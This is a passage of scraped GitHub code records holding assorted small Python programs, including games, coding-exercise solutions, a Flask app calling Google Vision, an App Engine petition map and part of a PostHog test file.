'Peak' \"\"\"\n\n name_val = hour_profile.name_val\n profile = hour_profile.df_profile\n\n # find base or peak or off-peak hours according to hour input\n profile = self.__hour_matcher(profile=profile, hour=hour)\n\n # grouping df into the hours and products\n grouped_by_hedge_product = self.__product_grouper(profile=profile, product=product, name_val=name_val)\n\n # adjust index to cal,q or m\n profile = self.__to_period_on_index(profile=profile, product=product)\n\n # calculate and assign every hour with the hedge product value\n profile['average'] = grouped_by_hedge_product.transform('mean')\n # write nan on the hours not included in the hedge\n profile.loc[profile['hedge_hour'] == False, ['average']] = np.NaN\n # create another column with 0 instead of nan, to better caclulate later\n profile['average_non_nan'] = profile['average'].fillna(0)\n \n # return TadingProducts - There is the rounding to two digigts\n hedges = self.to_list_of_trading_products(profile=profile, product=product, hour=hour)\n \n return hedges\n\n @staticmethod\n def __hour_matcher(profile:pd.DataFrame, hour: Hours):\n \"\"\"find the hours matching the input of hour\"\"\"\n if hour == Hours.base:\n profile['hedge_hour'] = True\n elif hour == Hours.off_peak:\n profile['hedge_hour'] = profile['is_peak'] \\\n .map({True: False, False: True})\n elif hour == Hours.peak:\n profile['hedge_hour'] = profile['is_peak']\n return profile\n\n @staticmethod\n def __product_grouper(profile:pd.DataFrame, product: Products, name_val):\n \"\"\"find the product hours matching the input and group the date accordingly\"\"\"\n if product == Products.cal:\n grouped_profile = profile.groupby(['hedge_hour', 'year'])\n elif product == Products.q:\n grouped_profile = profile.groupby(['hedge_hour', 'year', 'quarter'])\n elif product == Products.m:\n grouped_profile = profile.groupby(['hedge_hour', 'year', 'month'])\n\n return grouped_profile[name_val]\n\n @staticmethod\n def __to_period_on_index(profile:pd.DataFrame, product: Products):\n \n if product == Products.cal:\n period = profile.index.to_period('Y')\n elif product == Products.q:\n period = profile.index.to_period('Q')\n elif product == Products.m:\n period = profile.index.to_period('M')\n\n profile['hedge_group'] = period\n profile['start'] = period.to_timestamp(how='start')\n profile['end'] = period.to_timestamp(how='end')\n \n return profile\n\n @staticmethod\n def __calc_residual_profile(profile:pd.DataFrame):\n profile['residual'] = profile['mw'] - profile['average_non_nan']\n return profile\n\n def __return_hedge_based_on_type(self, hedge_type:HedgeType, product:Products, hour:Hours):\n \n \n if hedge_type == HedgeType.quantity:\n # quantity hedge\n hedges = self.calc_quantity_hedges(product=product, hour=hour)\n\n elif hedge_type == HedgeType.value:\n # value hedge\n hedges = self.calc_value_hedges(product=product, hour=hour)\n else:\n raise NotImplementedError('HedgeType not implemented')\n \n return hedges\n\n def __rename_val_col_to_mw(self):\n rename = {\n self.initial_hourProfile.name_val : 'mw'\n }\n self.initial_hourProfile.df_profile.rename(columns=rename, inplace=True)\n self.initial_hourProfile.name_val = 'mw'","repo_name":"AeDani/EnergyUtils","sub_path":"modules/hedging.py","file_name":"hedging.py","file_ext":"py","file_size_in_byte":11493,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73167816488","text":"import random, sys\r\n\r\nprint('ROCK , PAPER, SCISSORS')\r\n\r\nwins = 0\r\nties = 0\r\nlosses = 
0\r\n\r\n# choose what to display\r\n\r\nwhile True:\r\n    print(f'{wins} wins, {losses} losses, {ties} ties')\r\n\r\n    while True:\r\n        print('Enter your move: (r)ock (p)aper (s)cissors or (q)uit')\r\n        playerMove = input()\r\n        if playerMove == 'r' or playerMove == 'p' or playerMove == 's':\r\n            break\r\n        elif playerMove == 'q':\r\n            sys.exit()\r\n\r\n        else:\r\n            print('Write either \"r\" for rock, \"p\" for paper or \"s\" for scissors')\r\n\r\n    # players input\r\n\r\n    if playerMove == 'r':\r\n        print('ROCK versus...')\r\n    elif playerMove == 'p':\r\n        print('PAPER versus...')\r\n    elif playerMove == 's':\r\n        print('SCISSORS versus...')\r\n\r\n    # computers input\r\n    randomNumber = random.randint(1, 3)\r\n    if randomNumber == 1:\r\n        computerMove = 'r'\r\n        print('ROCK')\r\n    elif randomNumber == 2:\r\n        computerMove = 'p'\r\n        print('PAPER')\r\n    elif randomNumber == 3:\r\n        computerMove = 's'\r\n        print('SCISSORS')\r\n\r\n    # what's gonna happen aka grand finale\r\n\r\n    if playerMove == computerMove:\r\n        print('Tie')\r\n        ties = ties + 1\r\n    elif playerMove == 'r' and computerMove == 'p':\r\n        print('You lose')\r\n        losses = losses + 1\r\n    elif playerMove == 'p' and computerMove == 's':\r\n        print('You lose')\r\n        losses = losses + 1\r\n    elif playerMove == 's' and computerMove == 'r':\r\n        print('You lose')\r\n        losses = losses + 1\r\n    elif playerMove == 'r' and computerMove == 's':\r\n        print('You win')\r\n        wins = wins + 1\r\n    elif playerMove == 'p' and computerMove == 'r':\r\n        print('You win')\r\n        wins = wins + 1\r\n    elif playerMove == 's' and computerMove == 'p':\r\n        print('You win')\r\n        wins = wins + 1\r\n","repo_name":"nanoblyat/rockpapersiccor","sub_path":"rpsgame.py","file_name":"rpsgame.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74949871848","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\n##########################################################################\n#\t> File Name: 83_remove_duplicates_from_sorted_list.py\n#\t> Author: Tingjian Lau\n#\t> Mail: tjliu@mail.ustc.edu.cn\n#\t> Created Time: 2016/05/16\n#########################################################################\n\n# Definition for singly-linked list.\n# class ListNode(object):\n#     def __init__(self, x):\n#         self.val = x\n#         self.next = None\n\nclass Solution(object):\n    def deleteDuplicates(self, head):\n        \"\"\"\n        :type head: ListNode\n        :rtype: ListNode\n        \"\"\"\n        p = head\n        \n        while p:\n            if not p.next:\n                break\n            if p.val == p.next.val:\n                p.next = p.next.next\n            else:\n                p = p.next\n        \n        return head\n","repo_name":"tingjianlau/my-leetcode","sub_path":"83_remove_duplicates_from_sorted_list/83_remove_duplicates_from_sorted_list.py","file_name":"83_remove_duplicates_from_sorted_list.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
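A quick self-contained run of the sorted-list deduplication just above (with a local ListNode and a re-stated function, since the record only sketches the node class in a comment):

```python
class ListNode(object):
    def __init__(self, x):
        self.val = x
        self.next = None

def delete_duplicates(head):
    # same single-pass logic as the record's deleteDuplicates
    p = head
    while p and p.next:
        if p.val == p.next.val:
            p.next = p.next.next  # splice out the duplicate, stay put
        else:
            p = p.next
    return head

# build 1 -> 1 -> 2 -> 3 -> 3 and dedupe it
head = ListNode(1)
head.next = ListNode(1)
head.next.next = ListNode(2)
head.next.next.next = ListNode(3)
head.next.next.next.next = ListNode(3)

node, out = delete_duplicates(head), []
while node:
    out.append(node.val)
    node = node.next
print(out)  # [1, 2, 3]
```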
+{"seq_id":"12103884970","text":"# Let's decide whether to take an umbrella tomorrow.\n# Conditions: will it rain? (0: rain, 1: no rain)\n#             is it cloudy? (0: cloudy, 1: not cloudy)\n# If it rains or it is cloudy, take an umbrella and leave work early.\n# Otherwise, ask what to do instead and print the answer followed by 'time to go do that'.\n\nquestion = '''\nConditions: will it rain? (0: rain, 1: no rain)\n            is it cloudy? (0: cloudy, 1: not cloudy)\nExample input: raining and cloudy => 0 0\n'''\nrain, day = input(question).split()\nif rain == '0' or day =='0':\n    print('Take an umbrella.')\n    print('Leave work early.')\nelse:\n    print('No umbrella needed.')\n    data = input('Then what should we do?')\n    print(data, '- time to go do that')","repo_name":"jinhuioh/home_pythorn","sub_path":"pythonProject1/oper/oper04.py","file_name":"oper04.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1733426562","text":"from geopy.geocoders import Nominatim\r\nfrom geopy import distance\r\n\r\ngeodecoder = Nominatim(user_agent=\"python\")\r\n\r\nprint(\"\"\"\r\n\tWELCOME TO AERIAL DISTANCE CALCULATOR!\r\n\"\"\")\r\n\r\nlocation1 = input(\"\\tEnter your current location : \")\r\nlocation2 = input(\"\\tEnter your destination : \")\r\n\r\ncoordinates1 = geodecoder.geocode(location1)\r\ncoordinates2 = geodecoder.geocode(location2)\r\n\r\nlat1 = coordinates1.latitude\r\nlon1 = coordinates1.longitude\r\nlat2 = coordinates2.latitude\r\nlon2 = coordinates2.longitude\r\n\r\nstarting = (lat1, lon1)\r\ndestination = (lat2, lon2)\r\n\r\ndist = distance.distance(starting, destination)\r\ndiststr = str(dist)\r\naccdist = diststr.split(\".\", 2)[0]\r\nprint(f\"\\n\\tYour aerial distance would be around {accdist} km (approx).\")\r\n","repo_name":"InvisiblePro/Hacktoberfest-2022","sub_path":"Jupyter/Aerial_distance_calculator/Aerial_Distance_Calc.py","file_name":"Aerial_Distance_Calc.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"53"} +{"seq_id":"39892472734","text":"import math\narr = []\nwith open('Problem 99 base_exp.txt') as data:\n    for i in data:\n        x = i.replace('\\n','').split(',')\n        if x != []:\n            arr.append(x)\n\n\nres = 0\nfor i in range(1, len(arr)):\n    #print(i)\n    x = int(arr[res][0])\n    x_diff = int(arr[res][1])\n    y = int(arr[i][0])\n    y_diff = int(arr[i][1])\n\n    while (y_diff != x_diff) and (y_diff != 1 and x_diff != 1):\n        #print(x_diff, y_diff)\n        if x_diff > y_diff:\n            x_diff -= y_diff\n            y /= x\n        else:\n            y_diff -= x_diff\n            x /= y\n    if y > x:\n        res = i\n\nprint(res + 1)\n \n","repo_name":"MikhailGusarov/ProjectEuler","sub_path":"Problem 99.py","file_name":"Problem 99.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
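The pairwise subtract-and-divide loop in the Project Euler record above can be replaced outright: a^b > c^d exactly when b*ln(a) > d*ln(c), so one pass over the pairs settles it. A sketch assuming the same comma-separated base,exponent file format:

```python
import math

# (base, exponent) pairs, e.g. parsed from 'Problem 99 base_exp.txt'
pairs = [(519432, 525806), (632382, 518061), (78864, 613712)]

# the line maximizing exponent * ln(base) maximizes base ** exponent
best = max(range(len(pairs)), key=lambda i: pairs[i][1] * math.log(pairs[i][0]))
print(best + 1)  # 1-indexed line number, matching the record's output convention
```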
Перезапустите программу!\")\r\n\texit()\r\n\r\nelif countZero == 2:\r\n\r\n\ti = resultList.index(0)\r\n\ti += 1\r\n\r\n\twhile resultList[i] != 0:\r\n\t\tsumm += resultList[i]\r\n\t\ti += 1\r\n\r\nelif countZero > 2:\r\n\r\n\tstart = resultList.index(0)\r\n\r\n\tresultList.reverse()\r\n\tfinish = len(resultList) - resultList.index(0)\r\n\r\n\tresultList.reverse()\r\n\r\n\tinterestList = resultList[start:finish]\r\n\t\r\n\tsumm = sum(interestList)\r\n\r\nprint(\"Сумма между крайними нулями\", summ)\r\n","repo_name":"666sempron999/Abramyan-tasks-","sub_path":"Series(40)/25.py","file_name":"25.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19208236906","text":"from flask import Flask, render_template, request, redirect, make_response, send_file, session, Markup\r\nfrom flask_bootstrap import Bootstrap\r\n\r\nfrom google.cloud import vision\r\nfrom google.cloud import storage\r\nimport os\r\n\r\n\r\nos.environ['GOOGLE_APPLICATION_CREDENTIALS']=r'ServiceAccount_DocumentAI.json' \r\n\r\napp = Flask(__name__)\r\napp.secret_key = \"Sravan_789\" \r\nbootstrap = Bootstrap(app)\r\n\r\n@app.route('/',methods=['GET', 'POST']) \r\ndef g_vision(): \r\n return render_template(\"g_vision.html\") \r\n@app.route('/g_vision1',methods=['GET', 'POST']) \r\ndef g_vision1():\r\n \r\n if request.form.get(\"gv_1\"):\r\n gv_title=\"Label Detection\"\r\n gv_description=\"The Label Detection can detect and extract information about entities in an image, across a broad group of categories. Labels can identify general objects, locations, activities, animal species, products, and more.\"\r\n \r\n elif request.form.get(\"gv_2\"):\r\n gv_title=\"Text Detection\"\r\n gv_description=\"Text Detection detects and extracts text from any image. For example, a photograph might contain a street sign or traffic sign\"\r\n \r\n elif request.form.get(\"gv_3\"):\r\n gv_title=\"Ladmark Detection\"\r\n gv_description=\"Landmark Detection detects popular natural and human-made structures within an image.\"\r\n \r\n elif request.form.get(\"gv_4\"):\r\n gv_title=\"Logo Detection\"\r\n gv_description=\"Logo Detection detects popular product logos within an image\"\r\n \r\n elif request.form.get(\"gv_5\"):\r\n gv_title=\"Safesearch Detection\"\r\n gv_description=\"SafeSearch Detection detects explicit content such as adult content or violent content within an image. This feature uses five categories (adult, spoof, medical, violence, and racy) and returns the likelihood that each is present in a given image.\"\r\n \r\n elif request.form.get(\"gv_6\"):\r\n gv_title=\"Emotion Detection\"\r\n gv_description=\"Emotion Detection detects the emotion of the person in the image. This feature uses four categories (joy, anger, sorrow, and surprise.) and returns the likelihood that each is present in a given image. 
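# The three-branch zero handling in the Series25 solution above collapses
# to one path: locate the first and last zero, then sum the slice between
# them (interior zeros contribute nothing). Sketch over a plain list of
# ints containing at least two zeros.
def sum_between_zeros(values):
    first = values.index(0)
    last = len(values) - 1 - values[::-1].index(0)
    return sum(values[first + 1:last])

assert sum_between_zeros([1, 0, 2, 3, 0, 4]) == 5
assert sum_between_zeros([0, 0]) == 0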
\"\r\n \r\n elif request.form.get(\"gv_7\"):\r\n gv_title=\"Web Content Detection\"\r\n gv_description=\"Web Content Detection detects Web references to an image.\" \r\n \r\n session['gv_title']=gv_title\r\n session['gv_description']=gv_description\r\n \r\n return render_template(\"g_vision1.html\",gv_title=gv_title,gv_description=gv_description) \r\n\r\n@app.route('/g_vision2',methods=['GET', 'POST']) \r\ndef g_vision2(): \r\n \r\n gv_title=session['gv_title']\r\n gv_description=session['gv_description']\r\n \r\n file = request.files['file'] \r\n filename = file.filename \r\n \r\n os.environ['GOOGLE_APPLICATION_CREDENTIALS']=r'ServiceAccount_DocumentAI.json'\r\n \r\n client1 = storage.Client()\r\n bucket = client1.bucket('sravan_vision')\r\n blob = bucket.blob(filename)\r\n blob.upload_from_file(file)\r\n \r\n image_uri = \"gs://sravan_vision/%s\" % (filename)\r\n client = vision.ImageAnnotatorClient()\r\n image = vision.Image()\r\n image.source.image_uri = image_uri\r\n \r\n if gv_title==\"Label Detection\":\r\n \r\n response1 = client.label_detection(image=image)\r\n l1=[]\r\n for label in response1.label_annotations:\r\n l1.append([label.description, '%.2f%%' % (label.score*100.)])\r\n return render_template(\"g_vision1.html\",l1=l1,gv_title=gv_title,gv_description=gv_description) \r\n\r\n elif gv_title==\"Text Detection\":\r\n \r\n response2 = client.text_detection(image=image)\r\n l2=response2.full_text_annotation.text\r\n return render_template(\"g_vision1.html\",l2=l2,gv_title=gv_title,gv_description=gv_description) \r\n \r\n elif gv_title==\"Ladmark Detection\":\r\n \r\n response3 = client.landmark_detection(image=image)\r\n l3=[]\r\n for landmark in response3.landmark_annotations:\r\n for landmark2 in landmark.locations:\r\n l3.append([landmark.description,landmark2.lat_lng])\r\n return render_template(\"g_vision1.html\",l3=l3,gv_title=gv_title,gv_description=gv_description) \r\n \r\n elif gv_title==\"Logo Detection\":\r\n \r\n response4 = client.logo_detection(image=image)\r\n l4=[]\r\n for logo in response4.logo_annotations:\r\n l4.append([logo.description,'%.2f%%' % (logo.score*100.)])\r\n return render_template(\"g_vision1.html\",l4=l4,gv_title=gv_title,gv_description=gv_description) \r\n \r\n elif gv_title==\"Safesearch Detection\":\r\n \r\n response5 = client.safe_search_detection(image=image)\r\n safe = response5.safe_search_annotation\r\n \r\n likelihood_name = ('UNKNOWN', 'VERY_UNLIKELY', 'UNLIKELY', 'POSSIBLE',\r\n 'LIKELY', 'VERY_LIKELY')\r\n l5 = {'Adult': format(likelihood_name[safe.adult]),\r\n 'Medical': format(likelihood_name[safe.medical]),\r\n 'Spoofed': format(likelihood_name[safe.spoof]),\r\n 'Violence': format(likelihood_name[safe.violence]),\r\n 'Racy': format(likelihood_name[safe.racy])\r\n }\r\n return render_template(\"g_vision1.html\",l5=l5,gv_title=gv_title,gv_description=gv_description) \r\n \r\n elif gv_title==\"Emotion Detection\":\r\n \r\n response6 = client.face_detection(image=image)\r\n likelihood_name = ('UNKNOWN', 'VERY_UNLIKELY', 'UNLIKELY', 'POSSIBLE',\r\n 'LIKELY', 'VERY_LIKELY')\r\n for face in response6.face_annotations:\r\n l6 = {'Anger': format(likelihood_name[face.anger_likelihood]),\r\n 'Joy': format(likelihood_name[face.joy_likelihood]),\r\n 'Surprise': format(likelihood_name[face.surprise_likelihood]), \r\n 'Sorrow': format(likelihood_name[face.sorrow_likelihood])\r\n }\r\n return render_template(\"g_vision1.html\",l6=l6,gv_title=gv_title,gv_description=gv_description) \r\n \r\n elif gv_title==\"Web Content Detection\":\r\n \r\n 
response7 = client.web_detection(image=image)\r\n annotations = response7.web_detection\r\n l7=[]\r\n \r\n if annotations.best_guess_labels:\r\n for label in annotations.best_guess_labels:\r\n l7.append('\\nBest guess label: {}'.format(label.label))\r\n \r\n if annotations.pages_with_matching_images:\r\n l7.append('\\n{} Pages with matching images found:'.format(\r\n len(annotations.pages_with_matching_images)))\r\n \r\n for page in annotations.pages_with_matching_images:\r\n l7.append(format(page.url))\r\n \r\n return render_template(\"g_vision1.html\",l7=l7,gv_title=gv_title,gv_description=gv_description) \r\n \r\n \r\nif __name__ == '__main__':\r\n #app.run(port=5000,debug=True)\r\n app.run(host='192.168.1.233',port=9898)","repo_name":"vipvivek15/AI-Internship-Projects","sub_path":"g_vision.py","file_name":"g_vision.py","file_ext":"py","file_size_in_byte":6974,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"22471475803","text":"import cgi\nimport os\n\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp.util import run_wsgi_app\nfrom google.appengine.ext.webapp import template\nfrom google.appengine.ext.webapp import template\nfrom google.appengine.ext import db\nfrom google.appengine.api import memcache\n\nfrom django.utils import simplejson\n\nimport models\nimport geocoder\nimport geodata\n\nMEMCACHE_MAXPOSTCODES = 'maxpostcode'\nMEMCACHE_STATECLUSTER = 'statecluster_'\n\nclass MainPage(webapp.RequestHandler):\n def get(self):\n template_values = {}\n path = os.path.join(os.path.dirname(__file__), 'templates/main.html')\n self.response.out.write(template.render(path, template_values))\n\nclass FormPage(webapp.RequestHandler):\n def get(self):\n template_values = {}\n path = os.path.join(os.path.dirname(__file__), 'templates/form.html')\n self.response.out.write(template.render(path, template_values))\n\nclass MapPage(webapp.RequestHandler):\n def get(self):\n template_values = {}\n path = os.path.join(os.path.dirname(__file__), 'templates/map.html')\n self.response.out.write(template.render(path, template_values))\n\nclass Guestbook(webapp.RequestHandler):\n def post(self):\n signer = models.PetitionSigner()\n signer.firstname = self.request.get('firstname')\n signer.lastname = self.request.get('lastname')\n signer.streetinfo = self.request.get('streetinfo')\n signer.city = self.request.get('city')\n signer.state = self.request.get('state')\n signer.postcode = int(self.request.get('postcode'))\n latlng = geocoder.geocodeAddress(signer.streetinfo + \" \" + signer.city + \" \" + signer.state + \" \" + str(signer.postcode))\n if latlng is not None:\n signer.latlng = latlng\n signer.put()\n clusterdata = {'lastname': signer.lastname,\n 'streetinfo': signer.streetinfo,\n 'city': signer.city,\n 'state': signer.state,\n 'postcode': signer.postcode,\n 'lat': latlng.lat,\n 'lng': latlng.lon}\n\n query = db.Query(models.RegionCluster)\n query.filter('type =', 'postcode')\n query.filter('name =', str(signer.postcode))\n result = query.get()\n if result is None:\n postcodecluster = models.RegionCluster()\n postcodecluster.type = 'postcode'\n postcodecluster.name = str(signer.postcode)\n postcodecluster.state = signer.state\n postcodecluster.data = simplejson.dumps([clusterdata])\n postcodecluster.count = 1\n latlng = geocoder.geocodeAddress(str(signer.postcode) + \",AU\")\n if latlng is not None:\n postcodecluster.latlng = latlng\n postcodecluster.put()\n else:\n postcodecluster = result\n postcodecluster.count 
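# The g_vision routes above annotate images through a GCS URI; the same
# client also accepts raw bytes, which is handy for local smoke tests.
# Sketch assuming google-cloud-vision is installed and credentials are
# configured as in the app above.
from google.cloud import vision

def labels_for_file(path):
    client = vision.ImageAnnotatorClient()
    with open(path, 'rb') as f:
        image = vision.Image(content=f.read())
    response = client.label_detection(image=image)
    return [(label.description, label.score) for label in response.label_annotations]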
= postcodecluster.count + 1\n data = simplejson.loads(postcodecluster.data)\n data.append(clusterdata)\n postcodecluster.data = simplejson.dumps(data)\n postcodecluster.put()\n\n # Remember the max number of addresses in a postcode, useful for clustering\n maxpostcodes = memcache.get(MEMCACHE_MAXPOSTCODES)\n if maxpostcodes is not None:\n if int(maxpostcodes) < postcodecluster.count:\n memcache.set(MEMCACHE_MAXPOSTCODES, str(postcodecluster.count))\n else:\n findMaxInPostcodes()\n memcache.delete(MEMCACHE_STATECLUSTER + signer.state)\n self.redirect('/map?postcode=' + str(signer.postcode) + '&state=' + signer.state)\n\ndef findMaxInPostcodes():\n query = db.Query(models.RegionCluster)\n query.filter('type =', 'postcode')\n query.order('-count')\n result = query.get()\n memcache.set(MEMCACHE_MAXPOSTCODES, str(result.count))\n return result.count\n\nclass Setup(webapp.RequestHandler):\n def post(self):\n for state in geodata.states:\n statecluster = RegionCluster()\n statecluster.type = 'state'\n statecluster.name = state.name\n statecluster.data = '[]'\n statecluster.count = 0\n statecluster.latlng = GeoPt(state.lat, state.lng)\n statecluster.put()\n self.response.out.write('Added all the states')\n\nclass ClusterGenerator(webapp.RequestHandler):\n def get(self):\n data = {}\n data['states'] = {}\n maxpostcodes = memcache.get(MEMCACHE_MAXPOSTCODES)\n if maxpostcodes is None:\n maxpostcodes = findMaxInPostcodes()\n data['maxpostcodes'] = int(maxpostcodes)\n\n for state in geodata.states:\n statedataString = memcache.get(MEMCACHE_STATECLUSTER + state['name'])\n if statedataString is None:\n query = db.Query(models.RegionCluster)\n query.filter('type =', 'postcode')\n query.filter('state =', state['name'])\n results = query.fetch(1000)\n statedata = {}\n statedata['lat'] = state['lat']\n statedata['lng'] = state['lng']\n statedata['count'] = len(results)\n statedata['postcodes'] = []\n for result in results:\n statedata['postcodes'].append(simplejson.loads(result.data))\n memcache.set(MEMCACHE_STATECLUSTER + state['name'], simplejson.dumps(statedata))\n else:\n statedata = simplejson.loads(statedataString)\n data['states'][state['name']] = statedata\n self.response.out.write(simplejson.dumps(data))\n\n\napplication = webapp.WSGIApplication(\n [\n ('/', MainPage),\n ('/signup', FormPage),\n ('/map', MapPage),\n ('/setup', Setup),\n ('/getclusters', ClusterGenerator),\n ('/sendform', Guestbook)],\n debug=True)\n\ndef main():\n run_wsgi_app(application)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"fredsa/pamelafox-samplecode","sub_path":"ygg/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70062433","text":"#coding=utf-8\r\n\r\n#WlAN网卡名字'Intel(R) Dual Band Wireless-AC 7265'\r\n\r\nimport sys\r\nfrom PyQt5.QtWidgets import QApplication,QMainWindow\r\nfrom Yiitao_Scan_ui import *\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n mainWindow = QMainWindow()\r\n\r\n ui = Ui_MainWindow()\r\n ui.setupUi(mainWindow)\r\n mainWindow.show()\r\n sys.exit(app.exec_())","repo_name":"Miracle778/My_PyQT_Lab","sub_path":"Scan/Yiitao_Scan.py","file_name":"Yiitao_Scan.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"71609978728","text":"#external libraries\nimport numpy as np\n\n#internal libraries\nfrom classes.node import Node\n\nclass Pipe():\n 
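# The max-postcode bookkeeping above follows a read-through cache pattern:
# try memcache, recompute on a miss, store the result. The same shape as a
# reusable helper; `compute` stands in for findMaxInPostcodes and is
# illustrative, not part of the app above.
from google.appengine.api import memcache

def cached(key, compute, ttl=0):
    value = memcache.get(key)
    if value is None:
        value = compute()
        memcache.set(key, value, time=ttl)
    return value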
'''\n Generic class for any kind of pipe.\n\n Arguments:\n - indx: Index of the element. If two pipes have the same indx, they'reconsidered as parallel. \n - ni: Node object of the first point of the Pipe.\n - nf: Node object of the second point of the Pipe.\n - d: List containing the diameter and its units [value, 'units'] [m].\n - Supported units: 'in', 'mm', 'm'\n - l: Length of the Pipe [m]\n '''\n def __init__(self, indx: int,\n ni: Node,\n nf: Node,\n d: list,\n l: float,\n c: float = 0) -> None:\n #primary attributes\n self.indx = indx;\n self.ni = ni;\n self.nf = nf;\n #properties\n self.d = self.verifyUnits(d);\n self.l = l;\n self.c = c;\n self.q = 0;\n #status attributes\n self.isParallel = False;\n pass\n\n def verifyUnits(self, list: list):\n if list[1].lower() == 'in':\n return list[0]*0.0254\n elif list[1].lower() == 'mm':\n return list[0]/1000\n elif list[1].lower() == 'm':\n return list[0]\n else:\n raise ValueError(f'Unsupported units for Pipe {self.indx}.')\n\n def addParallel(self, d: list,\n l: float):\n self.d.append(self.verifyUnits(d))\n self.l.append(l)\n","repo_name":"bacaxnot/cevil","sub_path":"aqueductnator/classes/pipe.py","file_name":"pipe.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28907386984","text":"from reptile import Reptile\n\nclass Snake(Reptile):\n def __init__(self):\n\n super().__init__()\n self.forked_tongue = True\n self.venom = True\n self.limbs = False\n\n def use_tongue_to_smell(self):\n return \"taste to smell, smell to taste\"\n\n\nif __name__ == \"__main__\":\n steve = Snake()\n print(steve.breathe())\n print(steve.cold_blooded)\n print(steve.use_tongue_to_smell())","repo_name":"ldaijiw/python_oop","sub_path":"snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35158944297","text":"def solution(babbling):\n answer = 0\n can = [\"aya\",\"ye\",\"woo\",\"ma\"]\n cant = [\"ayaaya\",\"yeye\",\"woowoo\",\"mama\"]\n \n for i in range(len(babbling)):\n flag= False\n for word in cant: # 연속해서 같은 발음 체크 \n if word in babbling[i]:\n flag = True\n continue\n if flag == False: # 아니면 \n if babbling[i] in can: # 한 단어 일치\n answer += 1\n else: # 여러 단어 합쳐진\n for c in can:\n babbling[i] = babbling[i].replace(c,\"_\")\n k = babbling[i].replace(\"_\",\"\")\n if k ==\"\":\n answer+=1\n\n return answer","repo_name":"yooooonzzzzzang/Algo_seed","sub_path":"프로그래머스/unrated/133499. 
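# The unit handling in Pipe.verifyUnits above, as a standalone helper for
# quick checks; the factors are exact ('in' -> 0.0254 m, 'mm' -> 1e-3 m).
_TO_METERS = {'in': 0.0254, 'mm': 0.001, 'm': 1.0}

def to_meters(value, units):
    try:
        return value * _TO_METERS[units.lower()]
    except KeyError:
        raise ValueError('Unsupported units: %r' % (units,))

assert abs(to_meters(4, 'in') - 0.1016) < 1e-12
assert abs(to_meters(250, 'mm') - 0.25) < 1e-12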
옹알이 (2)/옹알이 (2).py","file_name":"옹알이 (2).py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39512752269","text":"import datetime\nfrom typing import Dict, List\n\nfrom django.core.exceptions import ValidationError\nfrom django.db.utils import IntegrityError\n\nfrom posthog.models.dashboard import Dashboard\nfrom posthog.models.dashboard_tile import (\n DashboardTile,\n Text,\n get_tiles_ordered_by_position,\n)\nfrom posthog.models.exported_asset import ExportedAsset\nfrom posthog.models.insight import Insight\nfrom posthog.test.base import APIBaseTest\nfrom posthog.test.db_context_capturing import capture_db_queries\n\n\nclass TestDashboardTileModel(APIBaseTest):\n dashboard: Dashboard\n asset: ExportedAsset\n tiles: List[DashboardTile]\n\n def setUp(self) -> None:\n self.dashboard = Dashboard.objects.create(team=self.team, name=\"private dashboard\", created_by=self.user)\n for i in range(10):\n if i > 6:\n text = Text.objects.create(team=self.team, body=f\"text-{i}\")\n DashboardTile.objects.create(dashboard=self.dashboard, text=text)\n else:\n insight = Insight.objects.create(team=self.team, short_id=f\"123456-{i}\", name=f\"insight-{i}\")\n DashboardTile.objects.create(dashboard=self.dashboard, insight=insight)\n\n def test_loads_dashboard_tiles_efficiently(self) -> None:\n with capture_db_queries() as capture_query_context:\n tiles = get_tiles_ordered_by_position(dashboard=self.dashboard)\n\n for tile in tiles:\n assert tile.insight or tile.text\n\n assert len(tiles) == 10\n\n assert len(capture_query_context.captured_queries) == 1\n\n def test_loads_dashboard_tiles_excludes_deleted(self) -> None:\n tiles = get_tiles_ordered_by_position(dashboard=self.dashboard)\n assert len(tiles) == 10\n\n tiles[0].deleted = True\n tiles[0].save()\n\n insight = Insight.objects.get(team=self.team, short_id=\"123456-1\")\n insight.deleted = True\n insight.save()\n\n tiles = get_tiles_ordered_by_position(dashboard=self.dashboard)\n assert len(tiles) == 8\n\n def test_cannot_add_a_tile_with_insight_and_text_on_validation(self) -> None:\n insight = Insight.objects.create(team=self.team, short_id=\"123456\", name=\"My Test subscription\")\n text = Text.objects.create(team=self.team, body=\"I am a text\")\n\n with self.assertRaises(IntegrityError):\n DashboardTile.objects.create(dashboard=self.dashboard, insight=insight, text=text)\n\n def test_cannot_set_caching_data_for_text_tiles(self) -> None:\n tile_fields: List[Dict] = [\n {\"filters_hash\": \"123\"},\n {\"refreshing\": True},\n {\"refresh_attempt\": 2},\n {\"last_refresh\": datetime.datetime.now()},\n ]\n for invalid_text_tile_field in tile_fields:\n with self.subTest(option=invalid_text_tile_field):\n with 